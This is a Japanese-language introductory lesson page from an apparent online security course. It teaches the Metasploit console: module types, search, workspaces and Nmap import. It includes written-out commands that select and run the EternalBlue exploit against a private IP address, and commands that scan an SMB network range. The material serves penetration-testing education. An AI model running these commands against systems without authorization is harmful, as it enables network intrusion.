Metasploitのアーキテクチャとmsfconsole
msfconsoleを操作し、exploit、payload、moduleの構造を理解してオプションを設定します。
「Metasploitのアーキテクチャとmsfconsole」はCoddyKit上の無料Cyber Security Academyレッスンです。 これはレッスン1/4です。 下記で完全なレッスンを無料で読むことができます。その後、ブラウザ内の組み込みコードエディタと24時間対応のAIチューターでハンズオン演習できます。 これはCyber Security Academy学習パスの一部であり、ウェブとCoddyKitアプリ全体で進捗が同期されます。 Cyber Security Academyコースには全4レッスンが含まれています。
Metasploitとは
Metasploit Frameworkは、エクスプロイトの開発、テスト、実行を統一されたインターフェースで行えるオープンソースのペネトレーションテストプラットフォームです。認可されたラボ環境でのエクスプロイトにおける業界標準のツールです。
Metasploitのコンポーネント
主なコンポーネントは、msfconsole(対話型CLI)、msfvenom(ペイロード生成ツール)、Metasploit DB(ホストやセッションを保存するPostgreSQL)、Armitage(GUIフロントエンド)です。
msfconsoleの起動
msfconsoleを起動してデータベースを初期化します。プロンプトがmsf6 >に変わります。すべてのコマンド、モジュール名、オプションでタブ補完を使用できます。
# Start msfconsole
msfconsole
# Initialize database (if needed)
msfdb init
msfdb start
# Check DB connection
msf6 > db_status
# [*] Connected to msf. Connection type: postgresql.モジュールの種類
Metasploitでは、機能を次のモジュールタイプに分類しています。exploit(脆弱性固有の攻撃コード)、payload(エクスプロイト後に実行されるコード)、auxiliary(スキャナーやファザー)、post(ポストエクスプロイト)、encoder、nopです。
msf6 > show exploits # list exploit modules
msf6 > show auxiliary # list auxiliary modules
msf6 > show payloads # list payloads
msf6 > show post # post-exploitation modulesモジュールの検索
searchコマンドでは、名前、CVE、プラットフォーム、ランクによってモジュールを絞り込めます。モジュールのランクは信頼性を示します。Excellent > Great > Good > Normal > Average > Lowの順です。
msf6 > search type:exploit name:eternalblue
msf6 > search cve:2021-44228
msf6 > search platform:windows smb
msf6 > search rank:excellent ms17エクスプロイトモジュールの使用
useでモジュールを選択し、show optionsで必須オプションを確認し、setで値を設定して、runまたはexploitで実行します。
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > show options
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.10
msf6 exploit(ms17_010_eternalblue) > runグローバルオプションの設定
setgは、それ以降のすべてのモジュールに対してオプションをグローバルに設定します。エンゲージメント全体を通じて変わらないLHOST、LPORT、RHOSTSなどに便利です。
msf6 > setg LHOST 192.168.1.10
msf6 > setg LPORT 4444
# Unset global
msf6 > unsetg LHOSTAuxiliaryモジュール
Auxiliaryモジュールは、ペイロードを配信せずにスキャン、列挙、ファジングを実行します。例として、SMBバージョンスキャナー、SSHログインのブルートフォース、HTTPディレクトリスキャナーがあります。
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_version) > set THREADS 10
msf6 auxiliary(smb_version) > runワークスペースの管理
ワークスペースを使用すると、エンゲージメントごとにスキャンデータとセッションを整理できます。データを分離して管理できるよう、各アセスメントの開始時に新しいワークスペースを作成します。
msf6 > workspace # list workspaces
msf6 > workspace -a lab_test # create
msf6 > workspace lab_test # switch
msf6 > hosts # show discovered hosts
msf6 > services # show discovered servicesNmapとの連携
NmapのXMLスキャン結果をMetasploitのデータベースに直接インポートすると、ホストテーブルとサービステーブルにデータが登録され、対象を絞ったモジュール選択が可能になります。
msf6 > db_nmap -sV 192.168.1.0/24
# Or import existing XML:
msf6 > db_import /path/to/scan.xml
msf6 > hosts
msf6 > services -p 445ヘルプとドキュメント
すべてのモジュールには組み込みのドキュメントがあります。infoを使用すると、モジュールの説明、信頼性評価、参照情報(CVEやアドバイザリ)、必須オプションを確認できます。
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > info
# Shows: description, CVE references,
# platform, architecture, reliability rank確認問題
msfconsoleでモジュールを選択するコマンドはどれですか。
まとめ:Metasploitのアーキテクチャ
msfconsoleは中心的なハブです。モジュールを検索し、オプションを設定し、エクスプロイトを実行し、セッションを管理します。必ず名前付きのワークスペース内で作業し、Nmapの結果をインポートしてデータベースに登録し、実行前にモジュールの情報を確認してください。何をなぜ実行するのかを理解することが重要です。
よくある質問
「Metasploitのアーキテクチャとmsfconsole」レッスンは無料ですか?
はい。「Metasploitのアーキテクチャとmsfconsole」の完全なテキストはこのウェブで無料で読めます。インタラクティブに演習し(組み込みコードエディタと24時間対応のAIチューター)、Cyber Security Academyコースの残りをアンロックするには、CoddyKit PROにアップグレードしてください。 Cyber Security Academyコースには全4レッスンが含まれています。
「Metasploitのアーキテクチャとmsfconsole」で何を学びますか?
msfconsoleを操作し、exploit、payload、moduleの構造を理解してオプションを設定します。 ブラウザで直接実行するハンズオンコードでCyber Security Academyを演習し、24時間対応のAIチューターがレッスンを進める中での質問に答えます。
Cyber Security Academyを始めるのに経験は必要ですか?
事前経験は必要ありません。CoddyKitのCyber Security Academyは初級者から上級者向けに構成されているため、ここから始めるか最初から始めて、自分のペースで進むことができます。 これはレッスン1/4です。
「Metasploitのアーキテクチャとmsfconsole」レッスンにはどのくらい時間がかかりますか?
ほとんどのCoddyKitレッスンは約5~10分かかります。各レッスンはコンパクトでインタラクティブなので、着実に進歩し、ウェブとアプリ全体で正確に前回の場所から再開できます。
このCyber Security Academyレッスンでコードを書いて実行できますか?
はい。すべてのCyber Security Academyレッスンに組み込みコードエディタが含まれているため、ブラウザでリアルコードを書いて実行し、即座のAIフィードバックを取得できます。ローカル設定は不要です。
このコースのすべてのレッスン
- Metasploitのアーキテクチャとmsfconsole
- 既知の脆弱性の悪用
- Payload:stagedとstageless、Meterpreter
- 侵入後の操作:PivotとPersist